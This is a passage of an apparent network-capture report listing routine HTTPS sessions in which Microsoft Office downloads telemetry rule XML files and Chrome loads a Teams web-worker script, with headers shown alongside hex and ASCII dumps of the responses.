                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            42192.168.2.44987813.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:37 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:37 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                            x-ms-request-id: 481e6931-101e-0034-7113-4596ff000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175937Z-174f78459685726chC1EWRsnbg00000016cg0000000063ym
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:37 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            43192.168.2.44988013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:37 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:37 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                            x-ms-request-id: 663f4ef8-b01e-0053-4c19-44cdf8000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175937Z-174f7845968psccphC1EWRuz9s00000016n0000000001sy4
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:37 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            44192.168.2.44989513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:38 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:38 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                            x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175938Z-174f7845968pght8hC1EWRyvxg00000009f0000000006z1u
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            45192.168.2.44989613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:38 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                            x-ms-request-id: 896d1f20-701e-0001-29ee-44b110000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175939Z-174f7845968psccphC1EWRuz9s00000016m0000000005buz
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            46192.168.2.44989713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:38 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                            x-ms-request-id: 3deb74dd-c01e-00a1-07f7-447e4a000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175939Z-174f7845968cs2nkhC1EWR2tq000000001vg00000000sveg
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            47192.168.2.44990013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                            x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175939Z-174f7845968n2hr8hC1EWR9cag00000015u000000000um7f
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            48192.168.2.44990113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                            x-ms-request-id: 5e64b7e0-d01e-0049-7eb8-42e7dc000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T175939Z-174f78459685m244hC1EWRgp2c000000164000000000be5u
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            49192.168.2.44990952.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:59:39 UTC443OUTGET /v2/worker/precompiled-web-worker-7fb380386db128ff.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC7820INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-transform, must-revalidate, no-cache
                                                                                                                                                                                                                                                                            Content-Length: 9826298
                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Expires: Mon, 02 Dec 2024 17:59:40 GMT
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned];
                                                                                                                                                                                                                                                                            content-security-policy: block-all-mixed-content;base-uri 'none';child-src blob: data: https:;connect-src 'self' blob: data: https: http://localhost:4318 *.office.net ws://localhost:* wss://127.0.0.1:9002 wss://view-localhost:* wss://*.svc.ms wss://augloop-dogfood.officeppe.com wss://augloop.office.com wss://augloop.svc.cloud.microsoft wss://augloop-gcc.office.com wss://*.augloop-dogfood.officeppe.com wss://*.augloop.office.com wss://*.augloop-gcc.office.com wss://*.augloop.svc.cloud.microsoft wss://*.pptservicescast.edog.officeapps.live.com wss://*.pptservicescast.officeapps.live.com wss://pptservicescast.edog.officeapps.live.com wss://pptservicescast.gcc.osi.office365.us wss://pptservicescast.officeapps.live.com wss://pptservicescast.osi.office365.us wss://*.attend.teams.microsoft.com wss://*.attend.teams.microsoft.net wss://*.attend.gcc.teams.microsoft.com wss://attend.gcc.teams.microsoft.com wss://*.cts.azure.us wss://*.cts.speech.microsoft.com wss://*.cts.speech-test.microsoft.com wss://*.enterprisevoice [TRUNCATED]
                                                                                                                                                                                                                                                                            content-security-policy-report-only: img-src 'self' blob: data: https://statics.teams.cdn.office.net *.ams.gcc.teams.microsoft.com *.asm.skype.com *.asyncgw.teams.microsoft.com *.giphy.com *.loki.delve.office.com *.office.net *.officeapps.live.com *.sharepoint-df.com *.sharepoint.com bot-framework.azureedge.net connectoricons-prod.azureedge.net content.powerapps.com docs.botframework.com i.vimeocdn.com i.ytimg.com local.teams.office.com:* marketplacecdn.azureedge.net media.licdn.com outlook.office.com pbs.twimg.com raw.githubusercontent.com skypeteamsbotstorage.blob.core.windows.net statics.teams.microsoft.com substrate.office.com teams.microsoft.com urlp.sfbassets.com www.odwebp.svc.ms;frame-src https: mailto: ms-appx-web: ms-excel: ms-powerpoint: ms-visio: ms-whiteboard-preview: ms-word: msteams: onenote: pdf: sip: sips:;script-src 'nonce-qGcd8pSI4qY3JLDbYuQLug==' 'report-sample' https://statics.teams.cdn.office.net browser.events.data.microsoft.com local.teams.microsoft.invalid c1-powerpoint-15.cdn.office. [TRUNCATED]
                                                                                                                                                                                                                                                                            requestid: ceae09710a25c41743566e5508b922d0
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 31
                                                                                                                                                                                                                                                                            x-request-id: 07a6d2f8-8ac6-47bb-8e17-c6a7b38b10ec
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 7B985CC114F64866A890A8373CE0F0B0 Ref B: EWR30EDGE0420 Ref C: 2024-12-03T17:59:40Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 17:59:40 UTC402INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 61 2c 69 3d 7b 38 34 33 37 36 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 5b 7b 74 79 70 65 73 3a 7b 43 61 6c 6c 69 6e 67 53 65 72 76 69 63 65 53 74 61 74 65 3a 5b 35 2c 5b 22 46 61 69 6c 65 64 22 2c 22 4e 6f 74 52 65 61 64 79 22 2c 22 52 65 61 64 79 22 5d 5d 2c 43 61 6c 6c 53 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 5b 32 2c 7b 74 65 61 6d 73 43 61 6c 6c 49 64 3a 35 2c 74 69 6d 65 73 74 61 6d 70 3a 34 7d 5d 2c 49 6e 73 74 61 6e 74 4d 65 65 74 69 6e 67 49 6e 66 6f 3a 5b 32 2c 7b 75 72 6c 3a 31 2c 6d 65 65 74 69 6e 67 43 6f 64 65 3a 31 2c 70 61 73 73 63 6f 64 65 3a 31 2c 65 76 65 6e 74 44 61 74 61 3a 22 53 63 68 65 64 75 6c 69 6e 67 53 65 72 76 69 63 65 4d 65 65 74 69 6e 67 45 76 65 6e 74 54 79 70 65
                                                                                                                                                                                                                                                                            Data Ascii: (()=>{var e,t,n,r,a,i={84376:e=>{e.exports=[{types:{CallingServiceState:[5,["Failed","NotReady","Ready"]],CallStartTimestamp:[2,{teamsCallId:5,timestamp:4}],InstantMeetingInfo:[2,{url:1,meetingCode:1,passcode:1,eventData:"SchedulingServiceMeetingEventType
